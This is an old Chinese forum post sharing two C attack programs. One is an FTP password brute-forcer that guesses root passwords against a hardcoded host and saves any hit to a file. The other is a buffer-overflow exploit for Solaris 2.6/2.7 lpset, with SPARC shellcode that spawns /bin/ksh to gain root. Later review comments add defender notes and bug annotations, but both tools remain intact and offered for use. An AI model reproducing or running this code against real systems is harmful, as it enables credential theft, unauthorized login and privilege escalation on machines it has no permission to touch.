这是一个在Sco Unix下破解远程主机FTP密码的程序;在Sun UNIX,一般用户下获得root权限的程序

oicqkill 2002-02-02 12:54:54
/*
╔══这是一个在Sco Unix下破解远程主机FTP密码的的程序 ═══╗
║ 版权所有:风 情 主 人.Miracle.Talent. ║
║ (C)Copyright m9m Corp 2000.09.11 ║
╠═════════════════════════════╣
║ 2000.09.11 Sco Unix5.05下编译测试通过 ║
║ cc -o myftp_ok ftp.c -lsocket -lc -lcurses ║
║ 更改IP为要破解的远程主机IP再次编译就可以啦 ║
║ OICQ:3135773 11602011 ║
║ 地址:成都市 ║
║ home:http://oicqkill.wz.cz ║
║ E-mail:oicqkill@163.net ║
║ Tel:(86-028) 保密 ║
║ ║
╠═════════════════════════════╣
║ 作者:X.T.M.T. ║
║ 时间:2000.09.11 ║
╚═════════════════════════════╝*/
#include "sys/types.h"
#include "sys/socket.h"
#include "netinet/in.h"
#include "arpa/inet.h"
#include "netdb.h"
#include "string.h"
#include "stdlib.h"
#include "stdio.h"
#include "string.h"
#include "stdarg.h"

/* Fallback for systems whose headers do not define INADDR_NONE. */
#ifndef INADDR_NONE
#define INADDR_NONE 0xffffffff
#endif
/* MMXL: size of the reply buffer used by myread(). */
#define MMXL 1024
/* MYy and MYx are not referenced anywhere in the visible code. */
#define MYy 10
/* Mx: declared size of the candidate character table ps[]; also used as the
   index limit in pswdp(). */
#define Mx 95
#define MYx 2
/* YIP: the target address is fixed at compile time (loopback as published). */
#define YIP "127.0.0.1"

/* Target address as a string; filled from YIP in main(). */
char ip[16];
/* Candidate character table. The initializer is shorter than Mx, so the
   remaining elements are zero bytes. loopthestr() rotates it in place. */
char ps[Mx] = "qwertyuiopasdfghjklzxcvbnm1234567890-=!@#$%^&*()_+`~QWERTYUIOPASDFGHJKLZXCVBNM";
/* Current candidate password: at most 7 characters plus the terminator. */
char pswd[8];
/* Holds the ANSI colour escape sequence built in main(). */
char color[10];
/* first: set until pswdp() has been called once. */
int first = 1;
/* colorq/colorb: foreground counter and offset for the status-line colours. */
int colorq = 30;
int colorb = 7;
/* Presumably an address counter for readip(); never assigned in the visible code. */
int ipjishu;
/* Per-position indices into ps[] used by pswdp(). */
int i0 = 0, i1 = 0, i2 = 0, i3 = 0, i4 = 0, i5 = 0, i6 = 0, i7 = 0;
/* Retry counter for connectsock(); reset to 0 before it returns. */
unsigned int connectloop = 0;

/* Forward declarations. NOTE(review): read() and write() are called below
   without a declaration in scope (no <unistd.h> among the includes). */
void readip(int ipjishu);
void loopthestr(void);
void wtfile(const char *filename, const char *ip, const char *user, const char *passwd);
char *pswdp(void);
int myread(int s);
int connectsock(const char *host, const char *service, const char *transport);
/*------------------------
实际过程的函数
------------------------*/
/*
 * Entry point of the FTP password-guessing program.
 *
 * Each loop iteration takes the next candidate from pswdp(), builds
 * "USER root\r\nPASS <candidate>\r\n" in wtline, sends it on the FTP control
 * connection and classifies the reply with myread(). On a reply classified
 * as success the address, user and password are appended to ./mypasswd.
 *
 * Defender view: on the wire this is a long run of USER root / PASS pairs on
 * one control connection, each answered with a 530 reply. Listing root in
 * the FTP server's deny list (commonly /etc/ftpusers), capping failed logins
 * per connection and alerting on bursts of 530 replies from one source all
 * address this pattern. A file named "mypasswd" holding lines of the form
 * written by wtfile() is a host artifact of this tool.
 *
 * NOTE(review): "void main" is non-standard; the return type should be int.
 */
void main(void){
int s = -1, i = 0, flag = 1;
char user[7] = "USER ";
char pass[7] = "PASS ";
char r_n[3] = "\r\n";
char wtline[30];
const char *filename = "./mypasswd";
memset(&ip, '\0', 16);
memset(&pswd, '\0', 8);
memset(&color, '\0', 10);
/* ESC[2J clears the terminal. */
printf("%c[2J", 27);
/* ip was just zeroed, so this copies the compile-time target into it. */
strncat((char *)ip, (char *)YIP, 16);
for(; flag; )
{
/* Cycle the status-line colours, restarting once colorq passes 37. */
if(colorq > 37)
{
colorb = 7;
colorq = 30;
}
sprintf(color, "%c[%d;%dm", 27, colorq, (colorq+colorb+10));
colorq++;
colorb -= 2;

memset(&pswd, '\0', 8);
/* NOTE(review): pswdp() returns pswd itself, so source and destination of
   this sprintf overlap, which is undefined behaviour. */
sprintf(pswd, "%s", pswdp());
memset(&wtline, '\0', 30);
/* NOTE(review): each strncat below is bounded by the length of its source,
   not by the space left in wtline. */
strncat(wtline, user, 7);
strncat(wtline, (char *)"root", strlen("root"));
strncat(wtline, r_n, strlen(r_n));
strncat(wtline, pass, strlen(pass));

strncat(wtline, pswd, strlen(pswd));
strncat(wtline, r_n, strlen(r_n));
/* Connect only when no descriptor is held yet; the same connection is reused
   for later candidates and is never closed. */
if((s == -1) || (s == 0))
s = connectsock((const char *)ip, "ftp", "tcp");

/* NOTE(review): color is passed as the format string; printf("%s", color)
   or fputs would avoid a non-literal format. */
printf(color);
printf("%c[25;2H", 27);
printf(" ");
printf("%c[25;2H", 27);
printf("IP:%s 用户名:%s 当前密码:%s", YIP, "root", pswd);

/* NOTE(review): the return value of write() is ignored. */
write((int)s, wtline, strlen(wtline));
i=myread(s);
/* 3 (read returned 0) or 2 (530 reply): go on to the next candidate. */
if(i == 3 || i == 2)
{
continue;
}
/* 0 (unclassified reply): resend the same lines once, then loop again. */
if(i == 0)
{
write(s, wtline, strlen(wtline));
i=myread(s);
}
/* 1 (reply matched "logged in" or "230"): record the result and stop. */
else if(i == 1)
{
printf("%c[2J", 27);
printf("%c[25;2H", 27);
printf(" ");
printf("%c[25;2H", 27);
printf("IP:%s 用户名:%s 密码成功:%s\r\n", YIP, "root", pswd);
wtfile(filename, ip, "root", (const char*)pswd);
flag = 0;
break;
}
/* 5: the reply contained "Password:". */
else if(i == 5)
{
printf("要求输入密码!\r\n");
break;
}
/* 4: the reply contained "ame:". */
else if(i == 4)
{
printf("要求输入用户名!\r\n");
break;
}
else
break;
}
}
/*------------------------
读取指定的IP列表文件(待补充)
------------------------*/
/*
 * Unfinished stub: opens "ip.txt" for reading and does nothing with it.
 * Nothing in the visible code calls this function.
 *
 * NOTE(review): fopen() reports failure with NULL, so the comparison with -1
 * never detects it; the if controls only an empty statement, and the stream
 * is never closed.
 */
void readip(int ipjishu)
{
FILE *fp;
if((fp = fopen("ip.txt", "r")) != -1);
}
/*------------------------
将指定串写到指定文件中去
------------------------*/
/*
 * Appends one line holding the address, user name and password to
 * `filename`. The process exits if `filename` is an empty string.
 *
 * The credentials are stored in plaintext; main() passes "./mypasswd", so
 * the file is created in the current working directory.
 *
 * NOTE(review): the result of fopen() is not checked, so a failed open is
 * passed to fprintf()/fclose() as NULL. The definition uses old-style (K&R)
 * parameter declarations although the prototype above is in ANSI form.
 */
void wtfile(filename, ip, user, passwd)
const char *filename, *ip, *user, *passwd;
{
FILE *fp;
if(strlen(filename) == 0)
{
printf("对不起,文件名不能为空!\r\n");
exit(0);
}
/* "a": append, so earlier results in the file are kept. */
fp = fopen(filename, "a");
fprintf(fp, "ip:%s 用户名:%s 密码:%s\n", ip, user, passwd);
fclose(fp);
}
/*------------------------
读的程序
返回:
0.其它 :
1.破解成功
2.破解失败
3.要求输入用户名和密码
4.要求输入用户名
5.要求输入密码
------------------------*/
/*
 * Reads one chunk of the server's reply from descriptor s, prints it on the
 * status line and classifies it by substring match.
 *
 * Returns:
 *   1  reply contains "logged in" or "230"
 *   2  reply contains "530"
 *   5  reply contains "Password:"
 *   4  reply contains "ame:"
 *   3  read() returned 0
 *   0  anything else
 * A reply containing "331" or "220" is skipped by reading again.
 *
 * In FTP, 220 is the service greeting, 331 asks for the password, 230
 * confirms the login and 530 rejects it; a run of 530 replies to one client
 * is the server-side trace of this loop.
 *
 * NOTE(review): the codes are matched anywhere in the buffer, not only at
 * the start of a reply line, so unrelated text containing "230" also counts
 * as success.
 */
int myread(int s)
{
unsigned char lines[MMXL];
int i = 0;

memset((void *)lines, '\0', MMXL);
/* s is a by-value parameter, so a descriptor opened here is not handed back
   to the caller. */
if((s == -1) || (s == 0))
s = connectsock((const char *)ip, "ftp", "tcp");
/* NOTE(review): reading up to MMXL bytes leaves no room for a terminator;
   a full buffer makes the printf and strstr calls below read past the
   array. A return of -1 from read() is not handled separately. */
i = read(s, &lines, MMXL);
printf("%c[24;2H", 27);
printf(" ");
printf("%c[24;2H", 27);
printf("状态消息:%s", lines);
if((strstr((char *)lines, "logged in") != NULL) || (strstr((char *)lines, "230") != NULL))
return 1;
else if((strstr((char *)lines, "331") != NULL) || (strstr((char *)lines, "220") != NULL))
{
/* Intermediate reply: recurse to read the next chunk. */
return myread(s);
}
else if(strstr((char *)lines, "530") != NULL)
return 2;
else if(strstr((char *)lines, "Password:") != NULL)
return 5;
else if(strstr((char *)lines, "ame:") != NULL)
return 4;
else if(i == 0)
return 3;
else
return 0;
}
/*-----------------------
返回一个密码串
------------------------*/
/*
 * Returns the global candidate buffer pswd after updating it from the
 * character table ps[] and the per-position indices i0..i7.
 *
 * On the first call pswd is returned unchanged; main() has just zeroed it,
 * so the first candidate is the empty string. On later calls pswd[0] takes
 * the next character of ps[] until i0 passes Mx; the other positions are
 * written only inside the nested branches below.
 *
 * NOTE(review): ps[] has Mx elements, so the last valid index is Mx - 1.
 * The "> Mx" tests let i0 reach Mx before the reset, and ps[i0++] then reads
 * one element past the end of the array.
 */
char *pswdp(void)
{
if(first == 1)
{
first = 0;
return pswd;
}
if(i0 > Mx)
{
i0 = 0;
pswd[0] = ps[i0];
i1++;
if(i1 > Mx)
{
i0 = 0;
pswd[1] = ps[i1];
i2++;
if(i2 > Mx)
{
i2 = 0;
pswd[2] = ps[i2];
i3++;
if(i3 > Mx)
{
i3 = 0;
pswd[3] = ps[i3];
i4++;
if(i4 > Mx)
{
i4 = 0;
pswd[4] = ps[i4];
i5++;
if(i5 > Mx)
{
i5 = 0; pswd[5] = ps[i5];
i6++;
if(i6 > Mx)
{
i6 = 0;
pswd[6] = ps[i6];
i7++;
if(i7 > Mx)
{
/* All indices have overflowed: rotate the table and try again. */
loopthestr();
return pswdp();
}
}
}
}
}
}
}
}
else
{
pswd[0] = ps[i0++];
}
return pswd;
}
/*------------------------
循环移动字符串
------------------------*/
/*
 * Rotates the character table ps[] left by one position: every character
 * moves one slot towards the front and the former first character is placed
 * at the end of the string.
 *
 * NOTE(review): with an empty ps[], strlen(ps) - 1 wraps to a very large
 * unsigned value before it is converted to int; the visible initializer is
 * non-empty, so this does not occur as published.
 */
void loopthestr(void)
{
char tmp = ps[0];
/* j is the index of the last character of the string. */
int i,j = strlen(ps) - 1;
for(i = 0; i < j; i++)
ps[i] = ps[i+1];
/* The loop ends with i == j, the last slot. */
ps[i] = tmp;
}
/*------------------------
连接程序
------------------------*/
/*
 * Creates a socket and connects it to `service` on `host`.
 *
 * host      - host name or dotted-decimal address
 * service   - service name, or a port number given as a string
 * transport - "udp" selects SOCK_DGRAM; anything else selects SOCK_STREAM
 *
 * Returns the descriptor from socket(). A failed connect() is retried by
 * recursion while connectloop is below 99.
 *
 * NOTE(review): every lookup failure is only printed and execution carries
 * on; in particular ppe is dereferenced even when getprotobyname() returned
 * NULL. The result of socket() is not checked. The value returned by the
 * recursive retry is discarded, so after a failure the caller receives the
 * descriptor whose connect() failed, and failed descriptors are never closed.
 */
int connectsock(
const char *host,
const char *service,
const char *transport
)
{
struct hostent *phe;
struct servent *pse;
struct protoent *ppe;
struct sockaddr_in sin;
int s, type;

memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;

/* Resolve the port by service name first, then fall back to a number. */
if(pse = getservbyname(service, transport))
sin.sin_port = pse->s_port;
else if((sin.sin_port = htons((u_short)atoi(service))) == 0)
{
printf("无法获得主机端口!\r\n");
}

/* Resolve the host by name first, then fall back to a dotted address. */
if(phe = gethostbyname(host))
memcpy(&sin.sin_addr, phe->h_addr, phe->h_length);
else if((sin.sin_addr.s_addr = inet_addr(host)) == INADDR_NONE)
{
printf("无法获得主机名\r\n");
}

if((ppe = getprotobyname(transport)) == 0)
{
printf("无法取得使用的协议\r\n");
}

type = (strcmp(transport,"udp") == 0)?SOCK_DGRAM:SOCK_STREAM;
s = socket(PF_INET, type, ppe->p_proto);
if((connect(s, (struct sockaddr *)&sin, sizeof(sin)) == -1) && (connectloop < 99))
{
connectloop++;
connectsock(host, service, transport);
}
connectloop = 0;
return s;
}
/*
╔══这是一个在Sun UNIX,一般用户下获得root权限的程序 ═══╗
║ 版权所有:风 情 主 人.Miracle.Talent. ║
║ (C)Copyright m9m Corp 2001-09-21 ║
╠═════════════════════════════╣
║ Sun Unix下测试通过 ║
║ OICQ:3135773 11602011 ║
║ 地址:成都市 ║
║ home:http://oicqkill.wz.cz ║
║ E-mail:oicqkill@163.net ║
║ Tel:(86-028) 保密 ║
║ ║
╠═════════════════════════════╣
║ 作者:X.T.M.T. ║
║ 时间:2001-10-11 ║
╚═════════════════════════════╝*/
/* Layout constants for the argument string assembled in main():
   NOPNUM - 4 filler bytes, ALLIGN padding bytes of 0xff, and ADRNUM bytes
   holding the repeated 4-byte address. */
#define NOPNUM 864
#define ADRNUM 132
#define ALLIGN 3
/* SPARC machine code followed by the literal path "/bin/ksh"; the inline
   disassembly is the original author's. main() copies it with strlen(), so
   the bytes contain no zero byte before the terminator. */
char shellcode[] =
"\x20\xbf\xff\xff" /* bn,a <shellcode-4> */
"\x20\xbf\xff\xff" /* bn,a <shellcode> */
"\x7f\xff\xff\xff" /* call <shellcode+4> */
"\x90\x03\xe0\x20" /* add %o7,32,%o0 */
"\x92\x02\x20\x10" /* add %o0,16,%o1 */
"\xc0\x22\x20\x08" /* st %g0,[%o0+8] */
"\xd0\x22\x20\x10" /* st %o0,[%o0+16] */
"\xc0\x22\x20\x14" /* st %g0,[%o0+20] */
"\x82\x10\x20\x0b" /* mov 0xb,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"/bin/ksh"
;
/* Two instructions that main() calls as a function; per the inline
   disassembly they return the caller's stack pointer. */
char jump[] =
"\x81\xc3\xe0\x08" /* jmp %o7+8 */
"\x90\x10\x00\x0e" /* mov %sp,%o0 */
;
/* Four-byte filler pattern repeated in front of shellcode[]. */
static char nop[] = "\x80\x1c\x40\x11";
/*
 * Entry point of the second program. It assembles one oversized string and
 * passes it to /usr/bin/lpset as the value of the -a option. The banner
 * printed below names Solaris 2.6 and 2.7 on SPARC as the affected systems.
 *
 * String layout, in order: "xxx=", 2 bytes of 0xff, NOPNUM - 4 filler bytes
 * from nop[], the bytes of shellcode[], ALLIGN bytes of 0xff, then ADRNUM
 * bytes repeating the 4-byte value in adr.
 *
 * Defender view: the page describes this as going from an ordinary user to
 * root, which presumably relies on lpset being installed set-uid root -
 * verify on the host. Applying the vendor fix for lpset, removing the
 * set-uid bit where users do not need the tool, and enabling the
 * non-executable user stack (noexec_user_stack in /etc/system) reduce the
 * exposure. An lpset invocation whose -a value is about a kilobyte long and
 * full of non-printable bytes is the process-level trace.
 *
 * NOTE(review): main has no declared return type (implicit int) and returns
 * no value.
 */
main(int argc, char **argv)
{
char buffer[10000], adr[4], *b;
int i;

printf("本代码属于共享,任何人不得以任何方式买卖!\n");
printf("违反者将从WWW永远消失,因为将有千万的人攻击他!\n");
printf("/usr/bin/lpset for solaris 2.6 2.7 sparc\n\n");
/* Calls the bytes of jump[] as a function and adds a fixed offset to the
   value it returns. NOTE(review): the result is stored through an
   unsigned long pointer into a 4-byte char array; the array has no alignment
   guarantee, and the store overruns it where unsigned long is 8 bytes. */
*((unsigned long*)adr) = (*(unsigned long(*)())jump)() + 10088 + 400;
b = buffer;
sprintf(b, "xxx=");
b += 4;
for(i = 0; i < 2; i++)
*b++ = 0xff;
for(i = 0; i < NOPNUM - 4; i++)
*b++ = nop[i%4];
for(i = 0; i < strlen(shellcode); i++)
*b++ = shellcode[i];
for(i = 0; i < ALLIGN; i++)
*b++=0xff;
for(i = 0;i < ADRNUM; i++)
*b++ = adr[i%4];
/* Terminate the string; the total is far below sizeof buffer. */
*b = 0;
/* The first 0 ends the argument list; the second is the envp argument that
   execle() takes, here a null pointer. The result of execle() is not
   checked. */
execle("/usr/bin/lpset", "lsd", "-n", "xfn", "-a", buffer, "printer", 0, 0);
}
redhat7 2002-02-02
呵呵,恭喜你啊
